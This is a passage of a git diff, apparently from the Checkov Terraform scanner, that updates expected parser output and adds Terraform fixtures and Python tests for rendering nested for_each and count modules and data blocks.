"var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + "" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } ], "resource": [ @@ -512,7 +547,7 @@ true ], "bucket": [ - "var.bucket" + "" ], "ignore_public_acls": [ true @@ -520,7 +555,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -533,7 +569,7 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } } ] @@ -542,7 +578,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + "" ], "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.bucket2" } @@ -560,7 +596,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -568,7 +604,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -586,71 +623,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - "__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } ], "resource": [ @@ -666,7 +645,7 @@ true ], "bucket": [ - "var.bucket" + true ], "ignore_public_acls": [ true @@ -674,7 +653,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -687,7 +667,7 @@ "type": [ "string" ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } } ] @@ -696,7 +676,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + true ], "__address__": "module.s3_module2[1].module.inner_s3_module2.bucket2" } @@ -714,7 +694,7 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true @@ -722,7 +702,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -739,5 +720,32 @@ } } ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ], + "__address__": "count_var" + } + }, + { + "foreach_var": { + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ], + "__address__": "foreach_var" + } + } + ] } } \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf new file mode 100644 index 00000000000..630b9b5e172 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf @@ -0,0 +1,6 @@ +module "level2" { + source = "../level2_module" + for_each = var.file_map1_level1 + + times_to_duplicate_bucket = var.number_of_required_resources_var +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf new file mode 100644 index 00000000000..4af133126f8 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf @@ -0,0 +1,7 @@ +variable "file_map1_level1" { + type = map(string) +} + +variable "number_of_required_resources_var" { + type = number +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf new file mode 100644 index 00000000000..25c80ee2ef5 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + count = var.times_to_duplicate_bucket + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf new file mode 100644 index 00000000000..e1e257b40fc --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf @@ -0,0 +1,3 @@ +variable "times_to_duplicate_bucket" { + type = number +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf new file mode 100644 index 00000000000..4477e9361ae --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf @@ -0,0 +1,29 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1.txt" = "test1.txt" + "test2.txt" = "test2.txt" + } + number_of_required_resources = 2 +} + +# Expected resources: +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] + +module "level1" { + source = "./level1_module" + for_each = local.groups + + file_map1_level1 = local.files_map1 + number_of_required_resources_var = local.number_of_required_resources +} diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf new file mode 100644 index 00000000000..885a68e53e8 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf @@ -0,0 +1,10 @@ + +# Expected resources: +# module.simple[0].aws_s3_bucket_object.this_file + +# Actual resources: +# NONE +module "simple" { + source = "./simple" + count = 1 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf new file mode 100644 index 00000000000..f81b8cc8f28 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf @@ -0,0 +1,14 @@ +data "aws_s3_bucket" "data_list" { + for_each = toset(var.test_list.bucket) + bucket = each.value +} + +data "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + bucket = each.value +} + +data "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = count.index +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf new file mode 100644 index 00000000000..a96d924bd33 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf @@ -0,0 +1,14 @@ +variable "test_list" { + bucket = ["a", "b"] +} + +variable "test_dict" { + bucket = { + key1 = "a", + key2 = "b" + } +} + +variable "test_count" { + bucket = 2 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf new file mode 100644 index 00000000000..019ff3cc629 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf @@ -0,0 +1,13 @@ +data "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + bucket = each.value +} + +data "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = count.index +} + +data "aws_s3_bucket" "data" { + bucket = "a" +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf new file mode 100644 index 00000000000..ee85d8b430c --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf @@ -0,0 +1,15 @@ +resource "aws_s3_bucket" "data_dict" { + for_each = var.test_dict.bucket + subnet_id = each.value + bucket = data.aws_s3_bucket.data_dict[each.key].bucket +} + + +resource "aws_s3_bucket" "data_count" { + count = var.test_count.bucket + bucket = data.aws_s3_bucket.data_count[count.index].bucket +} + +resource "aws_s3_bucket" "data" { + subnet_id = data.aws_s3_bucket.data.bucket +} diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf new file mode 100644 index 00000000000..02caf819d73 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf @@ -0,0 +1,10 @@ +variable "test_dict" { + bucket = { + key1 = "a", + key2 = "b" + } +} + +variable "test_count" { + bucket = 2 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf new file mode 100644 index 00000000000..067fdda2b06 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf @@ -0,0 +1,6 @@ +module "level2" { + source = "../level2_module" + for_each = var.file_map1_level1 + + file_map_level2 = var.file_map2_level1 +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf new file mode 100644 index 00000000000..4e601f10af0 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf @@ -0,0 +1,7 @@ +variable "file_map1_level1" { + type = map(string) +} + +variable "file_map2_level1" { + type = map(string) +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf new file mode 100644 index 00000000000..7e4ad692554 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + for_each = var.file_map_level2 + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf new file mode 100644 index 00000000000..fc8b1ddfd9d --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf @@ -0,0 +1,3 @@ +variable "file_map_level2" { + type = map(string) +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf new file mode 100644 index 00000000000..da719081ea3 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf @@ -0,0 +1,32 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1.txt" = "test1.txt" + "test2.txt" = "test2.txt" + } + files_map2 = { + "test3.txt" = "test3.txt" + "test4.txt" = "test4.txt" + } +} + +# Expected resources: +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"] +# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"] + +module "level1" { + source = "./level1_module" + for_each = local.groups + + file_map1_level1 = local.files_map1 + file_map2_level1 = local.files_map2 +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf new file mode 100644 index 00000000000..20e13d97c6c --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf @@ -0,0 +1,22 @@ +locals { + groups = { + "blue" = "blue" + "green" = "green" + } + files_map1 = { + "test1" = "test1" + "test2" = "test2" + } +} + +# Expected resources: +# module.files["blue"].aws_s3_bucket_object.this_file["test1.txt"] +# module.files["blue"].aws_s3_bucket_object.this_file["test2.txt"] +# module.files["green"].aws_s3_bucket_object.this_file["test1.txt"] +# module.files["green"].aws_s3_bucket_object.this_file["test2.txt"] + +module "files" { + source = "./s3_files" + for_each = local.groups + file_map = local.files_map1 +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf new file mode 100644 index 00000000000..91db9c71cb6 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf @@ -0,0 +1,6 @@ +resource "aws_s3_bucket_object" "this_file" { + for_each = var.file_map + bucket = "your_bucket_name" + key = each.key + source = each.value +} diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf new file mode 100644 index 00000000000..c7721cd54e3 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf @@ -0,0 +1,3 @@ +variable "file_map" { + type = map(string) +} \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py index 50b2c89d5e5..9ddb2586686 100644 --- a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py +++ b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py @@ -387,6 +387,45 @@ def test_foreach_module_and_resource(checkov_source_path): assert graph.vertices[9].config['aws_s3_bucket_public_access_block']['var_bucket["b"]']['__address__'] == 'module.s3_module["b"].aws_s3_bucket_public_access_block.var_bucket["b"]' +@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"}) +def test_foreach_data(checkov_source_path): + dir_name = 'data_simple' + graph, _ = build_and_get_graph_by_path(dir_name, render_var=True) + tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name) + + assert len([block for block in graph.vertices if block.block_type == 'data']) == 6 + assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 6 + + data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data'] + assert 'aws_s3_bucket.data_list["b"]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[0]' in data_vertices_names + assert 'aws_s3_bucket.data_list["a"]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[1]' in data_vertices_names + + +@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"}) +def test_foreach_data_with_resource(checkov_source_path): + dir_name = 'data_with_resource' + graph, _ = build_and_get_graph_by_path(dir_name, render_var=True) + tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name) + + assert len([block for block in graph.vertices if block.block_type == 'data']) == 5 + assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 5 + + data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data'] + assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[0]' in data_vertices_names + assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names + assert 'aws_s3_bucket.data_count[1]' in data_vertices_names + + assert graph.vertices[0].attributes['bucket'] == graph.vertices[3].attributes['bucket'] + assert graph.vertices[1].attributes['bucket'] == graph.vertices[4].attributes['bucket'] + assert graph.vertices[8].attributes['bucket'] == graph.vertices[10].attributes['bucket'] + assert graph.vertices[9].attributes['bucket'] == graph.vertices[11].attributes['bucket'] + + @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"}) def test_foreach_module_with_more_than_two_resources(checkov_source_path): dir_name = 'foreach_module_with_more_than_two_resources' @@ -448,8 +487,89 @@ def test__get_module_with_only_relevant_foreach_idx(): nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', nested_tf_module=None)) result = ForeachModuleHandler._get_module_with_only_relevant_foreach_idx('test', original_key, module) assert result == TFModule(name='1', path='1', foreach_idx='1', - nested_tf_module=TFModule(name='2', path='2', foreach_idx='test', - nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', - nested_tf_module=None) - ) - ) + nested_tf_module=TFModule(name='2', path='2', foreach_idx='test', + nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', + nested_tf_module=None) + ) + ) + +def test_nested_foreach_with_variable_reference(): + """ + Here we test that a nested foreach loop based on module locals is correctly rendered in the Terraform graph. + """ + resources_by_group_local_var = 2 + resources_by_files_local_var = 2 + + dir_name = 'foreach_examples/nested_foreach_based_on_module_locals' + graph = build_and_get_graph_by_path(dir_name)[0] + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var) + assert graph_resources_created == ['module.files["blue"].aws_s3_bucket_object.this_file["test1"]', + 'module.files["green"].aws_s3_bucket_object.this_file["test1"]', + 'module.files["blue"].aws_s3_bucket_object.this_file["test2"]', + 'module.files["green"].aws_s3_bucket_object.this_file["test2"]'] + + +def test_double_nested_foreach_with_variable_reference(): + """ + Here we test that a 2 level nested foreach loop based on module local vars is correctly rendered in the Terraform graph. + + In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt) + and 2 resources for each (test3.txt, test4.txt). + So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource). + + The unique use case is that the for_each attributes depends on the main module's local variables. + """ + dir_name = 'foreach_examples/module_foreach_module_foreach_resource_foreach' + graph = build_and_get_graph_by_path(dir_name)[0] + + graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices) + graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter)) + + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6) + assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8) + + assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]', + 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]'] + + +def test_double_nested_foreach_and_count_with_variable_reference(): + """ + Here we test that a 2 level nested foreach loop and count based on module locals is correctly rendered in the Terraform graph. + In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt) + and 2 resources for each (count of 2). + So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource: count = 2). + + The unique use case is that the count and for_each attributes (multiple levels) depends on the main module's local variables. + """ + dir_name = 'count_examples/module_foreach_module_foreach_resource_count' + graph = build_and_get_graph_by_path(dir_name)[0] + + graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices) + graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter)) + + graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices) + graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter)) + + assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6) + assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8) + + assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]', + 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]', + 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]'] diff --git a/tests/terraform/runner/test_runner.py b/tests/terraform/runner/test_runner.py index 7d5c10f7afa..8072dfe3b92 100644 --- a/tests/terraform/runner/test_runner.py +++ b/tests/terraform/runner/test_runner.py @@ -188,7 +188,7 @@ def test_runner_passing_valid_tf(self): 'hard_fail_threshold': None}), 1) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(9, summary['failed']) + self.assertEqual(10, summary['failed']) self.assertEqual(1, summary['skipped']) self.assertEqual(0, summary["parsing_errors"]) @@ -337,7 +337,7 @@ def test_runner_specific_file(self): # self.assertEqual(report.get_exit_code(), 0) summary = report.get_summary() self.assertGreaterEqual(summary['passed'], 1) - self.assertEqual(5, summary['failed']) + self.assertEqual(6, summary['failed']) self.assertEqual(0, summary["parsing_errors"]) def test_check_ids_dont_collide(self): @@ -469,7 +469,7 @@ def test_no_missing_ids(self): for check_list in [aws_checks, gcp_checks, azure_checks]: check_list.sort(reverse=True, key=lambda s: int(s.split('_')[-1])) - for i in range(1, len(aws_checks) + 5): + for i in range(1, len(aws_checks) + 4): if f'CKV2_AWS_{i}' == 'CKV2_AWS_17': # CKV2_AWS_17 was overly keen and those resources it checks are created 